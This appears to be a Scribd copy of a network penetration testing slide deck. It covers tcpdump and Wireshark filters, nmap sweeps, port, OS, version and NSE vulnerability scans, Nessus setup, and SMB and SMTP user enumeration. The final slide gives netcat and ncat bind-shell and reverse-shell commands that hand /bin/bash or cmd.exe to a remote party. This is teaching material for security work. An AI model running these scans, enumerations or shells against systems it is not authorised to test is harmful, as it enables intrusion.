Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd
Upload
5 views

Scanning

Uploaded by

testetestecite
Copyright
© © All Rights Reserved
Available Formats
Download as ODP, PDF, TXT or read online on Scribd
5 views

Scanning

Uploaded by

testetestecite
Copyright
© © All Rights Reserved
Available Formats
Download as ODP, PDF, TXT or read online on Scribd
You are on page 1/ 15

Network Penetration Testing

Scanning Steps

Network Sweeping

Network Tracing

Port Scanning

OS Fingerprinting

Version Scanning

Vulnerability Scanning

2
Scanning

TIPS

–When scanning systems use IP addresses instead of Domain


Names.
–In large scan cases use most popular ports instead of all ports OR
if you want to scan all the ports use multiple systems to perform
full scanning on the target organization.
–Run a sniffer.

3
Sniffers


TCPDUMP
–tcpdump -nn -X -v -i eth0 -s0
–tcpdump -nn {tcp|udp|icmp|arp|ip} {and|or|not} {port} {and|or|not}
{dst|src|host} 8.8.8.8
–tcpdump -nn tcp and port 21 and host 10.0.2.5 -i eth0 -s0 -w ftp.pcapng

–tcpdump -nn -r ftp.pcapng



Wireshark
–ip.addr == 192.168.1.14
–ip.addr == 192.168.1.1 and http
–http or arp
–ip.addr == 192.168.1.1 and tcp.port == 80

4
Network Sweeping


NMAP do host discovery through ARP(local),
ICMP(root), TCP SYN port 443, TCP ACK port 80.
–nmap -n -sn 8.8.8.8

If the above method fails run normal port scanning


without host discovery.


–nmap -n -Pn -sS 8.8.8.8

5
Network Tracing

Linux traceroute use UDP by default


–traceroute -n 8.8.8.8 #UDP

–traceroute -I 8.8.8.8 #ICMP

–traceroute -T 8.8.8.8 #TCP

Windows tracert use ICMP by default


–tracert -d 8.8.8.8 #ICMP

6
Port Scanning

TCP Three way handshake


7
Port Scanning

TCP Behavior

–send=SYN, recieve=SYN-ACK

Port Open

–send=SYN, recieve=RST-ACK

Port Close

–send=SYN, recieve=ICMP-Port-Unreachable

Blocked by Firewall (Filtered)


–send=SYN, recieve=Nothing

Blocked by Firewall (Filtered)



8
Port Scanning

UDP Behavior

–send=UDP, recieve=UDP

Port Open

–send=UDP, recieve=ICMP-Port-Unreachable

Port Close OR Blocked by Firewall


–send=UDP, recieve=Nothing

Port Close OR Blocked by Firewall OR Port Open but it
is looking for specific data in UDP payload
Nmap result => (Open|Filtered)

9
Port Scanning

No host discovery and control speed


–nmap -Pn -T{0|1|2|3|4|5} 8.8.8.8

Scan type (SYN or Connect or UDP)


–nmap -s{S|T|U} 8.8.8.8

Scan specific ports


–nmap -p { 21,22,80,443 | 20-80 | - } 8.8.8.8


–nmap --top-ports 100 100 8.8.8.8

Store result in file


–nmap -oA filename 8.8.8.8

Special options

–nmap --reason 8.8.8.8

–nmap --badsum 8.8.8.8


10
OS Fingerprinting & Version Scanning

OS Fingerprinting

–nmap -O 8.8.8.8

Version Scanning

–nmap -sV 8.8.8.8

–nmap -A 8.8.8.8 #A = -sV -O -sC

11
Vulnerability Scanning

NMAP Script Engine


–ls /usr/share/nmap/scripts/

–nmap -sC 8.8.8.8

–nmap --script=http-robots.txt.nse -p80 8.8.8.8

–nmap -p 80 --script=http-vuln-cve2010-2861.nse 192.168.1.1

–nmap -p 21 --script=ftp-anon.nse 192.168.1.1

–nmap -p 139,445 --script=smb-security-mode.nse 192.168.1.1

–nmap -p 139,445 --script=smb* 192.168.1.1

–nmap --script=smb-os-discovery.nse 10.0.2.5

–nmap --script=dns-zone-transfer -p 53 zonetransfer.me


12
Vulnerability Scanning

Nessus

–https://www.tenable.com/downloads/nessus

–dpkg -i Nessus-6.9.4-debian6_amd64.deb

–service nessusd start

–update-rc.d nessusd enable

–https://localhost:8834/

13
Enumerating Users

SMB

–NULL Session

rpcclient -U "" -N 10.0.2.4


–enumdomusers

–queryuser 0x3e8

–Session with username and password

rpcclient -U "test" 10.0.2.4


–Enum4Linux

enum4linux 10.0.2.4

enum4linux -u "test" -p "test" 10.0.2.4


SMTP

–telnet 192.168.1.104 25

VRFY msfadmin

–smtp-user-enum -M VRFY -U users.txt -t 192.168.1.104


14
Netcat & Ncat

Find open ports


–nc -nv 127.0.0.1 21

–nc -vz 127.0.0.1 21

–nc -v 127.0.0.1 21

–timeout 1 nc -v 127.0.0.1 21

Chat using nc

–nc -nlvp 4444 #on server

–nc -nv 127.0.0.1 4444 #on client

Bind shell

–nc -nlvp 4444 -e /bin/bash (cmd.exe) #on target

–nc -nv 127.0.0.1 4444 #on attacker

Reverse shell

–nc -nlvp 4444 #on attacker

–nc -nv 127.0.0.1 4444 -e /bin/bash (cmd.exe) #on target

Ncat

–ncat --exec /bin/bash (cmd.exe) --allow 127.0.0.1 -vnl 4444 --ssl

–ncat -v 127.0.0.1 4444 --ssl


15

You might also like